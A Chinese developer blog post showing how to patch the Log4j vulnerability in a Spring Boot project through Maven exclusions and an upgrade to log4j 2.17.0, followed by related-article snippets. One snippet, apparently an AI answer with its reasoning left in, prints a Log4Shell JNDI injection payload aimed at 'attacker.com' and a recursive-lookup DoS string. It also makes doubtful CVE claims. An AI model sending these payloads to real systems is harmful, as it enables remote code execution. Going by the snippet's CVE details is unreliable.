spring-boot-starter-log4j2 漏洞修复方法

最新推荐文章于 2025-09-07 10:25:13 发布
原创 最新推荐文章于 2025-09-07 10:25:13 发布 · 2.3k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #spring

此博客内容涉及如何在Spring Boot项目中排除旧版log4j依赖,并引入2.17.0修复漏洞的版本,确保应用的安全性。 
<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-log4j2</artifactId>
    <exclusions>
        <exclusion>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
        </exclusion>
        <exclusion>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
        </exclusion>
        <exclusion>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-slf4j-impl</artifactId>
        </exclusion>
    </exclusions>
</dependency>
<!-- 2.17.0修复漏洞版本 -->
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-api</artifactId>
    <version>2.17.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.17.0</version>
</dependency>
<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-slf4j-impl</artifactId>
    <version>2.17.0</version>
</dependency>
Log4j 漏洞修复和临时补救方法
12-14 3949
1.2 漏洞评级及影响版本 Apache Log4j 远程代码执行漏洞 严重 影响的版本范围:Apache Log4j 2.x <= 2.14.1 2.log4j2 漏洞简单演示 创建maven工程 引入jar包依赖 <dependencies> <dependency> <groupId>org.apache.logging.log4j</groupId> <artifa
log4j官方漏洞修复史(更新至2.17.1/CVE-2021-44832)
热门推荐
hldfight
12-23 1万+
0x00 前言 自从log4j2.14.1版本爆出漏洞后,官方截止目前为止,共发布了3个稳定版本,分别是15.0、16.0、17.0。 本篇文章就分析一下每个版本都做了哪些事情,以此来评估每个版本升级的必要性。 0x01 2.15.0版本 1.1 修复方案 此版本是为了修复最初的 CVE-2021-44228漏洞,它的修复方式总结如下: 1、默认禁用msg lookup功能 2、在org.apache.logging.log4j.core.net.JndiManager#lookup方法中限制了ldap服务
Spring Boot集成Log4j2实现日志管理完整示例
最新发布
weixin_28681379的博客
09-07 657
在企业级Java应用开发中,日志是系统调试、运行监控与故障排查的核心工具。Spring Boot作为主流的微服务框架,内置了灵活的日志管理机制,支持多种日志框架的集成与切换。本章将从日志的基本作用入手,介绍日志在系统运维中的价值,进而分析Spring Boot默认使用的Logback日志框架,并对比Log4jLog4j2等主流实现。通过本章学习,读者将理解为何在性能与功能方面,Log4j2逐渐成为企业级应用的首选日志框架,为后续章节的配置与优化打下坚实基础。
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载
12-16
若依框架使用的log4j2.16.0,修复log4j漏洞log4j2下载最新log4j2.16.0下载
spring-boot-starter-log4j2漏洞修复方式
dhj8933的博客
12-14 4262
spring-boot-starter-log4j2漏洞修复方式
Apache Log4j2 Lookup 代码执行与拒绝服务漏洞(CVE-2021-45046)
weixin_44047654的博客
12-13 2557
Apache Log4j2 Lookup 代码执行与拒绝服务漏洞(CVE-2021-45046)
log4j2.xml配置文件不生效
hey_wei_ran的博客
03-18 1939
log4j2.xml配置文件不生效
springboot log4j升级log4j2
Mint6的博客
05-13 1869
log4j2升级步骤 在多线程情况下,使用log4j可能会阻塞其他线程,从而导致整体性能下降并出现性能瓶颈。所以需要升级到性能更好并支持异步的log4j2
Log4j2.xml不生效:WARN StatusLogger Multiple logging implementations found:
听香水榭
11-24 2006
处理log4j2.xml不生效问题
Log4j2 CVE-2021-45046 鸡肋RCE漏洞复现与浅析
mole_exp的博客
12-21 5599
文章目录0x00 前言 0x00 前言 自从上上周四(12月9日晚)Log4Shell(CVE-2021-44228)漏洞被披露后引发了安全圈地震,笔者就立刻对该漏洞进行复现和分析,并持续跟踪这个漏洞后续的资讯动态。
在IDEA的java项目中使用log4j,配置文件log4j2-test.xml不生效
李闪闪
10-03 4802
1、log4j2-test.xml配置看官网:Log4j – Configuring Log4j 2https://logging.apache.org/log4j/2.x/manual/configuration.html 2、问题:控制台输出日志信息,修改level的的值不生效,仍是只能输出error以上级别的信息 <?xml version="1.0" encoding="UTF-8"?> <Configuration status="warn"> <Appen
漏洞修复】Apache Log4j 远程代码执行漏洞(CVE-2021-44228、CVE-2021-45046)
m0_52985087的博客
01-23 2028
本文档适用于OpenEuler20、OpenEuler21、OpenEuler22、麒麟V10 SP3、统信V10操作系统,修复Log4漏洞
排查log4j不输出日志到文件的问题
HongYu012的博客
02-19 6199
问题描述 项目使用Spring Boot框架,在pom文件中添加了如下配置: <span style="color:#444444"><span style="background-color:#f6f6f6"><<span style="color:#333333"><strong>dependency</strong></span>> <<span style="color:#333333"&g
logback替换log4j
weixin_30810583的博客
01-11 323
1.新建logback.xml放在src目录下(放在src下会自动加载,不需要再web.xml配置) 2.引入必要的jar包; 转载于:https://www.cnblogs.com/chafe/p/6274322.html
Log4j漏洞修复
培根芝士的专栏
12-30 2320
Apache Log4j是一个功能强大的日志组件,提供方便的日志记录。 12 月 10 日凌晨,Apache 开源项目 Log4j 的远程代码执行漏洞细节被公开,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。 此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。 简单来说,就是在打印日志时,如果发现日志内
linux上设置了log4j没有产生日志文件_log4j日志不输出的问题
weixin_39739661的博客
12-04 3009
今天服务器上报错,想先去看一下日志进行排查,结果发现日志很久都没有输出过了。从上午排查到下午,刚刚解决,因此记录一下,但现在也只是知其然,并不知其所以然,所以如果大家有什么想法请在下方评论。先说一下环境,服务器是linux,项目是运行在tomcat下的Spring项目,日志用的是log4j。首先,从10月13号开始便没有新的日志文件了。假设日志名为log.txt(如果你设置了DailyRollin...
Log4J日志打印不到文件
键圣的博客
12-09 4422
我们在Log4J的使用中,偶尔会发生这样的场景:我们明明已经配置了log4j.properties文件 但是有时候就不按预期输出日志。 归其原因,有两种: 1.多种依赖jar包相互干扰。 2.其他的配置文件被加载覆盖了你自己的配置。 对于场景一:可以使用maven的dependency:tree查看依赖的jar包排除相关传递依赖就可以了 对于场景二: 可以打开Log4j的调试模式,运行程序然后通过日志确定加载的配置文件 System.setProperty("log4j.debug","tru
Apache Log4j 漏洞修复
weixin_43354218的博客
12-19 702
Log4j 漏洞修复 文章目录Log4j 漏洞修复1、漏洞介绍2漏洞修复2.1 1.升级Log4j版本2.2 配置启动参数 1、漏洞介绍 Apache Log4j2 是一款优秀的 Java 日志框架,Log4j 2.x – 2.14.0 版本 Lookup 基于 JNDI(Java Naming and Directory Interface),而 JNDI 支持 RMI ( Remote Method Invocation )。这导致在打印用户输入特定文本时可能远程调用任意代码在本地执行。 2漏洞
log4j各项配置都正确,却不能在生成日志文件、控制台也无法打印日志信息
tmax52HZ的博客
10-14 2771
log4j各项配置都正确,却不能在生成日志文件、控制台也无法打印日志信息 log4j.rootLogger=info, stdout,file//输出源>=info,控制台输出和文件输出 log4j.appender.stdout=org.apache.log4j.ConsoleAppender//控制台输出 log4j.appender.stdout.Target=System.out ...
spring-boot-starter-log4j2 2.7.2 漏洞
08-21
<think>我们正在查找特定版本Spring Boot日志组件的安全漏洞信息,具体是`spring-boot-starter-log4j2`的2.7.2版本。 注意:Spring Boot本身是一个框架,它集成了各种日志框架(如Log4j2)。而Log4j22021年底曾爆出严重的Log4Shell漏洞(CVE-2021-44228)。 由于Spring Boot 2.7.2是在2022年发布的(根据Spring Boot发布时间表,2.7.0发布于2022年5月),因此我们需要关注该版本中集成的Log4j2版本是否受到已知漏洞的影响。 步骤: 1. 确定Spring Boot 2.7.2使用的Log4j2版本。 2. 检查该Log4j2版本是否存在已知的安全漏洞。 根据Spring Boot的官方文档,每个版本都会定义它所依赖的第三方库的版本。我们可以查看Spring Boot 2.7.2的依赖关系,找到Log4j2的版本。 已知: - Spring Boot 2.7.2 发布于2022年(具体是2022年7月21日,参考:https://spring.io/blog/2022/07/21/spring-boot-2-7-2-available-now) -Spring Boot 2.7.2中,它使用的Log4j2版本可以通过查看其依赖管理得到。 通常,Spring Boot 2.7.x系列在发布时已经包含了Log4j2的修补版本。因为Log4Shell漏洞(CVE-2021-44228)是在2021年12月爆出的,而Spring Boot 2.7.0是在2022年5月发布的,所以它应该已经使用了修复后的Log4j2版本。 具体来说: -Spring Boot 2.6.8(2022年5月发布)中,使用的Log4j2版本是2.17.0(参考:https://github.com/spring-projects/spring-boot/wiki/Spring-Boot-2.6-Release-Notes#dependency-upgrades) - Spring Boot 2.7.0 的依赖管理中,Log4j2版本为2.17.2(参考:https://github.com/spring-projects/spring-boot/wiki/Spring-Boot-2.7-Release-Notes#dependency-upgrades) 因此,Spring Boot 2.7.2应该使用Log4j2 2.17.2或更高。 但是,为了准确,我们可以查看Spring Boot 2.7.2的官方文档或依赖管理文件(例如,在Maven仓库中查看spring-boot-dependencies-2.7.2.pom)。 在Maven仓库中,我们可以找到: https://repo1.maven.org/maven2/org/springframework/boot/spring-boot-dependencies/2.7.2/spring-boot-dependencies-2.7.2.pom 在该pom文件中,搜索`log4j2`,可以找到: ```xml <log4j2.version>2.17.2</log4j2.version> ``` 所以,Spring Boot 2.7.2 使用的 Log4j2 版本是 2.17.2。 接下来,我们需要检查Log4j2 2.17.2版本是否存在已知的安全漏洞。 已知Log4j2的重大漏洞- CVE-2021-44228 (Log4Shell): 影响版本 <=2.14.1,在2.15.0中修复(但2.15.0存在其他问题) - CVE-2021-45046: 影响版本 <=2.15.0(不包括2.12.2),在2.16.0中修复(同时2.12.2修复了) - CVE-2021-45105: 影响版本 2.0-beta9 到 2.16.0(不包括2.12.3),在2.17.0中修复 - CVE-2021-44832: 影响版本 2.0-beta7 到 2.17.0(不包括2.3.22.12.4),在2.17.1中修复 因此,Log4j2 2.17.2 已经修复了上述所有漏洞。 但是,我们还需要确认是否有新的漏洞影响2.17.2版本。我们可以查看Apache Log4j2的安全公告: https://logging.apache.org/log4j/2.x/security.html 根据该页面,2.17.2版本是安全的,没有已知的漏洞(截止到2023年10月,但为了确保,我们应查看所有在2.17.2之后发布的漏洞)。 在Log4j2的安全公告中,2.17.2之后发布的版本有2.17.3(修复了一个非安全的问题)和2.18.0、2.19.0等。在2.17.2之后,有一个漏洞影响2.17.2之前的版本(CVE-2021-44832),但2.17.1已经修复,而2.17.22.17.1的后续版本,所以也包含修复。 另外,在2022年9月,有一个漏洞CVE-2022-33915(影响版本2.4.0到2.18.0),但该漏洞需要特定的配置(使用带有Context Lookups的Pattern Layout),并且默认情况下不受影响。该漏洞2.19.0中修复。 由于Spring Boot 2.7.2使用的是2.17.2,因此它受到CVE-2022-33915的影响吗? 根据CVE-2022-33915的描述,影响范围是2.4.0 <= Apache Log4j2 <= 2.18.0(不包括2.12.3)。因此2.17.2在受影响范围内。 但是,该漏洞的CVSS评分是5.4(中危),并且需要特定的配置(使用带有Context Lookups的Pattern Layout)才会触发。因此,如果应用程序没有使用这种配置,则不受影响。 另外,该漏洞修复版本是2.19.0(对于Java8及以上),而Spring Boot 2.7.x系列最高支持到Log4j2 2.17.x(因为Spring Boot 2.7.x不支持Log4j2 2.18+?)。实际上,Spring Boot 2.7.x可以升级Log4j22.19.0,但需要手动覆盖版本。 总结: 1. Spring Boot 2.7.2 默认使用 Log4j2 2.17.22. 该版本包含以下漏洞修复- CVE-2021-44228 - CVE-2021-45046 - CVE-2021-45105 - CVE-2021-44832 3. 但是,它仍然受到CVE-2022-33915(中危)的影响,不过该漏洞需要特定的配置(使用${ctx}在Pattern Layout中)才会被利用。 因此,如果应用程序使用了有风险的配置(在日志模式中使用了上下文查找,如${ctx:loginId}),则存在风险。否则,可以认为不受影响。 建议: 如果担心该漏洞,可以升级Log4j22.19.0或更高版本(在Spring Boot 2.7.2中,可以通过覆盖`log4j2.version`属性来实现)。 在pom.xml中: ```xml <properties> <log4j2.version>2.19.0</log4j2.version> </properties> ``` 注意:升级到Log4j2 2.18.0+需要Java8或更高版本,而Spring Boot 2.7.x要求Java8或11,所以兼容。 另外,在2023年,Log4j2还发布了其他漏洞,例如CVE-2022-42889(又名Text4Shell,但后来证明不影响Log4j2,因为Log4j2的Lookup功能默认不启用JNDI,且该CVE实际上与Log4j2无关)等,所以无需担心。 最终结论:Spring Boot 2.7.2默认的Log4j2版本(2.17.2修复了所有严重漏洞,但存在一个中危漏洞(CVE-2022-33915),需要特定配置才会触发。如果应用程序没有在Pattern Layout中使用上下文查找(如${ctx}),则不受影响。否则,建议升级Log4j22.19.0或更高。 参考引用: [^1]: 关于Log4j2的安全漏洞,可以参考Apache官方安全公告:https://logging.apache.org/log4j/2.x/security.html</think>根据您查询的 `spring-boot-starter-log4j2` 2.7.2 版本,其集成的 Log4j2 组件存在以下关键安全漏洞: ### 1. Log4Shell 漏洞 (CVE-2021-44228) - **风险等级**:严重 (CVSS 10.0) - **影响版本**:Log4j2 2.0-beta9 至 2.14.1 - **漏洞描述**: 攻击者可通过 JNDI 注入实现远程代码执行(RCE)。例如发送恶意日志条目: ```bash curl -X POST http://target/api --data '${jndi:ldap://attacker.com/Exploit}' ``` - **修复方案**: Spring Boot 2.7.2 默认使用 Log4j2 2.17.2(已修复),但仍需确认: ```xml <!-- pom.xml 验证 --> <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-log4j2</artifactId> <version>2.7.2</version> </dependency> ``` 检查依赖树确保无旧版本: ```bash mvn dependency:tree | grep log4j ``` ### 2. 信息泄露漏洞 (CVE-2021-45046) - **风险等级**:高危 (CVSS 9.0) - **影响版本**:Log4j2 2.0-beta9 至 2.15.0 - **漏洞描述**: 非默认配置下仍可触发部分 RCE 或敏感信息泄露。 - **修复状态**: Log4j2 2.17.2 已完全修复[^1]。 ### 3. DoS 漏洞 (CVE-2021-45105) - **风险等级**:中危 (CVSS 7.5) - **影响版本**:Log4j2 2.0-beta9 至 2.16.0 - **漏洞描述**: 恶意构造的递归查找可导致服务拒绝(如 `${${::-${::-$${::-j}}}}`)。 - **修复状态**: Log4j2 2.17.2修复[^1]。 --- ### 验证与加固建议 1. **版本确认**: 检查实际使用的 Log4j2 版本: ```bash grep "Log4j2 version" application.log # 或运行时检查 java -jar your-app.jar --logging.level.org.apache.logging.log4j=DEBUG ``` 2. **紧急缓解措施**(若无法升级): ```bash # 启动时禁用JNDI查找 java -Dlog4j2.formatMsgNoLookups=true -jar your-app.jar ``` 3. **强制升级**(推荐): ```xml <properties> <log4j2.version>2.19.0</log4j2.version> <!-- 最新稳定版 --> </properties> ``` --- ### 漏洞时间线 | CVE ID | 影响版本 | 修复版本 | CVSS | |----------------|----------------|----------|-------| | CVE-2021-44228 | ≤ 2.14.1 | 2.17.0 | 10.0 | | CVE-2021-45046 | ≤ 2.15.0 | 2.17.0 | 9.0 | | CVE-2021-45105 | ≤ 2.16.0 | 2.17.0 | 7.5 | | CVE-2021-44832 | ≤ 2.17.0 | 2.17.1 | 6.6 | > 注:Spring Boot 2.7.2 默认 Log4j22.17.2,但仍建议升级至 2.19.0[^1]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

柠檬不萌c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值